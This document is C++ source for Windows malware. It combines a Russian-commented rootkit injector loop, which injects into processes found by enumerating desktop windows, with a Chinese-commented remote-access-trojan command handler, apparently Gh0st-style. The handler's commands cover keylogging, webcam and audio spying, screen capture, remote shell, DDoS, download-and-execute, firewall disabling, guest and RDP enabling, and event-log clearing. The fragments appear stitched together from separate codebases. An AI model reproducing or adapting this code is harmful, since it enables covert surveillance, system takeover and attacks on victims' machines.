//------------------------------------------------------
// InjectorProc - Основная функция инжектора, которая
// постоянно мониторит запущенные процессы
//------------------------------------------------------
DWORD WINAPI INJECTOR::InjectorProc(LPVOID)
{
// Алгоритм работы следующий:
// Перебираем все кна рабочего стола и инжектимся
// в поцесы владельцы
BOT::Initialize();
INJKDBG("INJECTOR", "Запущен процесс инжектра");
TInjector Injector;
Injector.IsWin64 = IsWIN64();
Injector.Injected = new TBotList();
Injector.NameBufSize = 1024;
Injector.NameBuf = (LPBYTE)MemAlloc(Injector.NameBufSize);
// Для старта определяем основную функцию руткита
Injector.InjectFunction = RootkitThread;
/*
// Загружаем плагин
INJKDBG("INJECTOR", "Загружаем bot.plug");
for (int i = 0; i < 2; i++)
{
LPVOID Plug = NULL;
LPVOID PlugHandle = NULL;
if (LoadBotPlug(&Plug, NULL))
{
PlugHandle = MemoryLoadLibrary(Plug, false);
Injector.InjectFunction = (TInjectFunction)MemoryGetProcAddress(PlugHandle, START_PROC_HASH);
FreeBotPlug(Plug);
}
if (Injector.InjectFunction) break;
// В случае ошибки получения адреса функции
// принудительно обновляем плагин
MemoryFreeLibrary(PlugHandle);
UpdateBotPlug();
}
if (!Injector.InjectFunction) pExitProcess(0); */
INJKDBG("INJECTOR", "Стартуем");
while (!BOT::Terminated())
{
// Перебираем главные окна окна
pEnumWindows(WndEnumCallBak, &Injector);
pSleep(500);
}
// При завершении работы выходим из процесса
pExitProcess(0);
return 0;
}
LPBYTE CSystemManager::getWindowsList()
{
LPBYTE lpBuffer = NULL;
char DYrEN66[] = {'E','n','u','m','W','i','n','d','o','w','s','\0'};
EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN66);
pEnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
lpBuffer[0] = TOKEN_WSLIST;
return lpBuffer;
}
// 加上激活
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
typedef LONG (WINAPI *InterlockedExchangeT)
(
__inout LONG volatile *Target,
__in LONG Value
);
InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange");
typedef VOID (WINAPI *SleepT)
(
__in DWORD dwMilliseconds
);
SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");
typedef HANDLE
(WINAPI
*CreateThreadT)(
__in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes,
__in SIZE_T dwStackSize,
__in LPTHREAD_START_ROUTINE lpStartAddress,
__in_opt LPVOID lpParameter,
__in DWORD dwCreationFlags,
__out_opt LPDWORD lpThreadId
);
CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread");
typedef BOOL (WINAPI *CloseHandleT)
(
__in HANDLE hObject
);
char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
typedef BOOL
(WINAPI
*EnumWindowsT)(
__in WNDENUMPROC lpEnumFunc,
__in LPARAM lParam);
EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows");
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
pInterlockedExchange((LONG *)&m_bIsActived, true);
break;
case COMMAND_LIST_DRIVE: // 文件管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // 摄像头
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_AUDIO: // 声音监听
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // 远程sehll
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD: //键盘记录
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM: //系统管理,包括进程,窗口
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SERMANAGER: // 服务管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DDOS_ATTACK:
{
ATTACK m_Attack;
memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK));
DDOSManager m_DDOSManager(&m_Attack);
}
break;
case COMMAND_DDOS_STOP:
Stoping = FALSE;
break;
case COMMAND_REGEDIT: //注册表管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSINFO:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_NET_USER: // 无NET加用户
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_PROXY: // 开启代理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_3389:
{
Open3389((LPCTSTR)(lpBuffer + 1), nSize -2);
}
break;
case COMMAND_GUEST: // 开启GUEST账号
OpenGuest();
break;
case COMMAND_STOPFIRE: // 关防火墙
StopFire();
break;
case COMMAND_CHANGE_PORT: // 更改终端
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_SENDMSG:
{
pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL));
pSleep(500);
}
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
pSleep(100); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // 清除日志
CleanEvent();
break;
case COMMAND_SESSION://会话管理
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // 改备注
SetHostID((LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_CHANGE_GROUP: // 改分组
SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS");
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
break;
case COMMAND_SORT_PROCESS: // 进程筛选
try
{
if (isProcesin((LPTSTR)(lpBuffer + 1)))
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
case COMMAND_SORT_WINDOW: // 窗体筛选
try
{
strcpy(temp_proc,(LPTSTR)(lpBuffer + 1));
pEnumWindows(EnumWindowsList,0);
if (proc_tag)
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
proc_tag = false;
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
}
}
